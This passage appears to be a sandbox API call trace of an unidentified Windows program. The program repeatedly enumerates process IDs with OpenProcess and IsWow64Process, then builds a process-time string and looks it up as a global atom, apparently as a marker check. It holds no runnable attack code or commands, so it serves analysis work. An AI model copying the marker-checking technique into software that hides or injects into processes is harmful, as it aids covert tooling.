	[0119.221] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.221] CloseHandle (hObject=0x698) returned 1
	[0119.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.221] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.221] CloseHandle (hObject=0x698) returned 1
	[0119.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.222] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.222] CloseHandle (hObject=0x698) returned 1
	[0119.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.222] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.222] CloseHandle (hObject=0x698) returned 1
	[0119.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.222] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.222] CloseHandle (hObject=0x698) returned 1
	[0119.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.222] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.223] CloseHandle (hObject=0x698) returned 1
	[0119.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.223] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.223] CloseHandle (hObject=0x698) returned 1
	[0119.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.223] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.223] CloseHandle (hObject=0x698) returned 1
	[0119.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.223] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.223] CloseHandle (hObject=0x698) returned 1
	[0119.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.223] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.223] CloseHandle (hObject=0x698) returned 1
	[0119.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.224] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.224] CloseHandle (hObject=0x698) returned 1
	[0119.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.224] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.224] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.224] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.225] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.225] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.225] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.227] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.227] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.227] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.227] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.227] CloseHandle (hObject=0x698) returned 1
	[0119.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.227] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.227] CloseHandle (hObject=0x698) returned 1
	[0119.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.228] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.228] CloseHandle (hObject=0x698) returned 1
	[0119.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.228] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.228] CloseHandle (hObject=0x698) returned 1
	[0119.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.337] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.337] CloseHandle (hObject=0x698) returned 1
	[0119.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.338] CloseHandle (hObject=0x698) returned 1
	[0119.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.338] CloseHandle (hObject=0x698) returned 1
	[0119.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.338] CloseHandle (hObject=0x698) returned 1
	[0119.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.338] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.339] CloseHandle (hObject=0x698) returned 1
	[0119.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.339] CloseHandle (hObject=0x698) returned 1
	[0119.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.339] CloseHandle (hObject=0x698) returned 1
	[0119.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.339] CloseHandle (hObject=0x698) returned 1
	[0119.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.339] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.340] CloseHandle (hObject=0x698) returned 1
	[0119.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.340] CloseHandle (hObject=0x698) returned 1
	[0119.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.340] CloseHandle (hObject=0x698) returned 1
	[0119.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.340] CloseHandle (hObject=0x698) returned 1
	[0119.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.340] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.340] CloseHandle (hObject=0x698) returned 1
	[0119.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.341] CloseHandle (hObject=0x698) returned 1
	[0119.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.341] CloseHandle (hObject=0x698) returned 1
	[0119.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.341] CloseHandle (hObject=0x698) returned 1
	[0119.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.341] CloseHandle (hObject=0x698) returned 1
	[0119.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.341] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.342] CloseHandle (hObject=0x698) returned 1
	[0119.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.342] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.342] CloseHandle (hObject=0x698) returned 1
	[0119.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.342] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.342] CloseHandle (hObject=0x698) returned 1
	[0119.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.342] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.342] CloseHandle (hObject=0x698) returned 1
	[0119.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.342] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.342] CloseHandle (hObject=0x698) returned 1
	[0119.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.343] CloseHandle (hObject=0x698) returned 1
	[0119.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.343] CloseHandle (hObject=0x698) returned 1
	[0119.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.343] CloseHandle (hObject=0x698) returned 1
	[0119.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.343] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.343] CloseHandle (hObject=0x698) returned 1
	[0119.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.344] CloseHandle (hObject=0x698) returned 1
	[0119.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.344] CloseHandle (hObject=0x698) returned 1
	[0119.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.344] CloseHandle (hObject=0x698) returned 1
	[0119.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.344] CloseHandle (hObject=0x698) returned 1
	[0119.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.344] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.344] CloseHandle (hObject=0x698) returned 1
	[0119.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.345] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.348] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.348] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.348] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.349] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.349] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.349] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.349] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.349] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.349] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.349] CloseHandle (hObject=0x698) returned 1
	[0119.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.350] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.350] CloseHandle (hObject=0x698) returned 1
	[0119.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.350] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.350] CloseHandle (hObject=0x698) returned 1
	[0119.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.350] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.350] CloseHandle (hObject=0x698) returned 1
	[0119.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.433] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.433] CloseHandle (hObject=0x698) returned 1
	[0119.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.433] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.433] CloseHandle (hObject=0x698) returned 1
	[0119.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.434] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.434] CloseHandle (hObject=0x698) returned 1
	[0119.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.434] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.434] CloseHandle (hObject=0x698) returned 1
	[0119.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.434] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.434] CloseHandle (hObject=0x698) returned 1
	[0119.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.434] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.435] CloseHandle (hObject=0x698) returned 1
	[0119.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.435] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.435] CloseHandle (hObject=0x698) returned 1
	[0119.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.435] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.435] CloseHandle (hObject=0x698) returned 1
	[0119.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.436] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.436] CloseHandle (hObject=0x698) returned 1
	[0119.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.436] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.436] CloseHandle (hObject=0x698) returned 1
	[0119.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.436] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.436] CloseHandle (hObject=0x698) returned 1
	[0119.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.436] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.436] CloseHandle (hObject=0x698) returned 1
	[0119.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.436] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.437] CloseHandle (hObject=0x698) returned 1
	[0119.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.437] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.437] CloseHandle (hObject=0x698) returned 1
	[0119.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.437] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.437] CloseHandle (hObject=0x698) returned 1
	[0119.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.437] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.437] CloseHandle (hObject=0x698) returned 1
	[0119.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.437] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.437] CloseHandle (hObject=0x698) returned 1
	[0119.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.438] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.438] CloseHandle (hObject=0x698) returned 1
	[0119.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.438] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.438] CloseHandle (hObject=0x698) returned 1
	[0119.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.438] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.438] CloseHandle (hObject=0x698) returned 1
	[0119.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.438] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.438] CloseHandle (hObject=0x698) returned 1
	[0119.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.438] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.439] CloseHandle (hObject=0x698) returned 1
	[0119.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.439] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.439] CloseHandle (hObject=0x698) returned 1
	[0119.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.439] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.439] CloseHandle (hObject=0x698) returned 1
	[0119.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.439] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.439] CloseHandle (hObject=0x698) returned 1
	[0119.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.439] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.439] CloseHandle (hObject=0x698) returned 1
	[0119.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.439] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.440] CloseHandle (hObject=0x698) returned 1
	[0119.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.440] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
